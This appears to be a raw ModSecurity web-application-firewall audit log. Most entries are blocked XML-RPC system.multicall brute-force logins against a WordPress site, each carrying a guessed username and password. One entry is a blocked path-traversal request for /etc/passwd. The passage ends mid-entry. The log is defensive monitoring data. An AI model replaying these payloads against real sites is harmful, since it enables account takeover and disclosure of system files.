[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105930556683 5723 (- - -) Stopwatch2: 1749105930556683 5723; combined=4061, p1=515, p2=3376, p3=0, p4=0, p5=101, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b278565d-Z-- --11d88a70-A-- [05/Jun/2025:13:47:24 +0700] aEE9fOth7G2xELALzPYjYQAAANQ 103.236.140.4 38262 103.236.140.4 8181 --11d88a70-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --11d88a70-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix@2020 --11d88a70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11d88a70-E-- --11d88a70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749106044896226 5621 (- - -) Stopwatch2: 1749106044896226 5621; combined=3952, p1=487, p2=3298, p3=0, p4=0, p5=99, sr=89, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11d88a70-Z-- --d150b855-A-- [05/Jun/2025:13:47:52 +0700] aEE9mCrHpfaS2Cuwh8XVNAAAAEw 103.236.140.4 38276 103.236.140.4 8181 --d150b855-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 478 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d150b855-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdMiN --d150b855-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d150b855-E-- --d150b855-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749106072030201 5778 (- - -) Stopwatch2: 1749106072030201 5778; combined=4136, p1=501, p2=3475, p3=0, p4=0, p5=94, sr=95, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d150b855-Z-- --54d7f52b-A-- [05/Jun/2025:13:50:15 +0700] aEE-J1wdJdhOudw5hdzPzgAAAI0 103.236.140.4 38382 103.236.140.4 8181 --54d7f52b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --54d7f52b-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminabcd1234 --54d7f52b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54d7f52b-E-- --54d7f52b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749106215271894 5844 (- - -) Stopwatch2: 1749106215271894 5844; combined=4096, p1=527, p2=3391, p3=0, p4=0, p5=106, sr=122, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54d7f52b-Z-- --b8b46277-A-- [05/Jun/2025:13:52:06 +0700] aEE-lirHpfaS2Cuwh8XVRQAAAEg 103.236.140.4 38420 103.236.140.4 8181 --b8b46277-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.166.185.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.166.185.26 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b8b46277-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminHWZ@2021 --b8b46277-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8b46277-E-- --b8b46277-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.166.185.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749106326289507 5886 (- - -) Stopwatch2: 1749106326289507 5886; combined=4171, p1=515, p2=3480, p3=0, p4=0, p5=103, sr=102, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8b46277-Z-- --1424a05f-A-- [05/Jun/2025:13:54:52 +0700] aEE_POth7G2xELALzPYjcAAAAMI 103.236.140.4 38476 103.236.140.4 8181 --1424a05f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1424a05f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin4 --1424a05f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1424a05f-E-- --1424a05f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749106492523270 4872 (- - -) Stopwatch2: 1749106492523270 4872; combined=3685, p1=395, p2=3118, p3=0, p4=0, p5=100, sr=80, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1424a05f-Z-- --b5334d73-A-- [05/Jun/2025:13:56:54 +0700] aEE_tVwdJdhOudw5hdzP2wAAAIM 103.236.140.4 38574 103.236.140.4 8181 --b5334d73-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.166.185.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.166.185.26 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b5334d73-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmintesting123 --b5334d73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5334d73-E-- --b5334d73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.166.185.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749106613995350 5991 (- - -) Stopwatch2: 1749106613995350 5991; combined=4323, p1=509, p2=3637, p3=0, p4=0, p5=104, sr=100, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5334d73-Z-- --a7017c79-A-- [05/Jun/2025:13:59:11 +0700] aEFAP-th7G2xELALzPYjjgAAANM 103.236.140.4 38666 103.236.140.4 8181 --a7017c79-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.166.185.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.166.185.26 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a7017c79-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh89 --a7017c79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7017c79-E-- --a7017c79-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.166.185.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749106751612695 5922 (- - -) Stopwatch2: 1749106751612695 5922; combined=4462, p1=533, p2=3644, p3=0, p4=0, p5=159, sr=90, sw=126, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7017c79-Z-- --452bce1b-A-- [05/Jun/2025:14:05:08 +0700] aEFBpH-K7ToMdu-YSIIlVQAAAAc 103.236.140.4 38898 103.236.140.4 8181 --452bce1b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.166.185.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.166.185.26 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --452bce1b-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin1123456 --452bce1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --452bce1b-E-- --452bce1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.166.185.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749107108379330 5397 (- - -) Stopwatch2: 1749107108379330 5397; combined=4059, p1=446, p2=3297, p3=0, p4=0, p5=214, sr=87, sw=102, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --452bce1b-Z-- --b14c2c3b-A-- [05/Jun/2025:14:12:46 +0700] aEFDblwdJdhOudw5hdzQGgAAAIw 103.236.140.4 39122 103.236.140.4 8181 --b14c2c3b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b14c2c3b-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmingoogle --b14c2c3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b14c2c3b-E-- --b14c2c3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749107566667460 4829 (- - -) Stopwatch2: 1749107566667460 4829; combined=3534, p1=399, p2=2962, p3=0, p4=0, p5=104, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b14c2c3b-Z-- --5aaaff5d-A-- [05/Jun/2025:14:14:49 +0700] aEFD6eth7G2xELALzPYjwwAAAMo 103.236.140.4 39170 103.236.140.4 8181 --5aaaff5d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 173.212.221.77 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 173.212.221.77 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5aaaff5d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehtest123 --5aaaff5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5aaaff5d-E-- --5aaaff5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 173.212.221.77 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749107689543780 5590 (- - -) Stopwatch2: 1749107689543780 5590; combined=4095, p1=536, p2=3366, p3=0, p4=0, p5=112, sr=88, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5aaaff5d-Z-- --793da438-A-- [05/Jun/2025:14:15:10 +0700] aEFD_uth7G2xELALzPYjxAAAAMw 103.236.140.4 39174 103.236.140.4 8181 --793da438-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --793da438-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh.1234 --793da438-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --793da438-E-- --793da438-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749107710544461 6261 (- - -) Stopwatch2: 1749107710544461 6261; combined=4432, p1=529, p2=3726, p3=0, p4=0, p5=105, sr=89, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --793da438-Z-- --68e15166-A-- [05/Jun/2025:14:18:03 +0700] aEFEq-th7G2xELALzPYjzAAAANQ 103.236.140.4 39258 103.236.140.4 8181 --68e15166-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --68e15166-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix123. --68e15166-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68e15166-E-- --68e15166-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749107883817152 6050 (- - -) Stopwatch2: 1749107883817152 6050; combined=4289, p1=520, p2=3590, p3=0, p4=0, p5=106, sr=95, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68e15166-Z-- --8044911e-A-- [05/Jun/2025:14:21:19 +0700] aEFFb-th7G2xELALzPYj0QAAAMM 103.236.140.4 39312 103.236.140.4 8181 --8044911e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8044911e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin1qaz2wsx --8044911e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8044911e-E-- --8044911e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108079134567 5303 (- - -) Stopwatch2: 1749108079134567 5303; combined=3932, p1=449, p2=3318, p3=0, p4=0, p5=97, sr=88, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8044911e-Z-- --d6a53713-A-- [05/Jun/2025:14:22:12 +0700] aEFFpOth7G2xELALzPYj2wAAAM0 103.236.140.4 39326 103.236.140.4 8181 --d6a53713-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 172604142 --d6a53713-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d6a53713-E-- --d6a53713-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108132696036 1569 (- - -) Stopwatch2: 1749108132696036 1569; combined=510, p1=352, p2=129, p3=0, p4=0, p5=29, sr=85, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6a53713-Z-- --b4bc051c-A-- [05/Jun/2025:14:23:23 +0700] aEFF63-K7ToMdu-YSIIlkQAAABE 103.236.140.4 39384 103.236.140.4 8181 --b4bc051c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b4bc051c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh-soleh --b4bc051c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4bc051c-E-- --b4bc051c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108203316791 6038 (- - -) Stopwatch2: 1749108203316791 6038; combined=4150, p1=532, p2=3433, p3=0, p4=0, p5=110, sr=92, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4bc051c-Z-- --d74f2468-A-- [05/Jun/2025:14:25:04 +0700] aEFGUCrHpfaS2Cuwh8XVjwAAAEg 103.236.140.4 39470 103.236.140.4 8181 --d74f2468-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 139.59.17.212 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 139.59.17.212 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d74f2468-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin1234! --d74f2468-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d74f2468-E-- --d74f2468-H-- Message: Access denied with code 403 (phase 2). Operator EQ 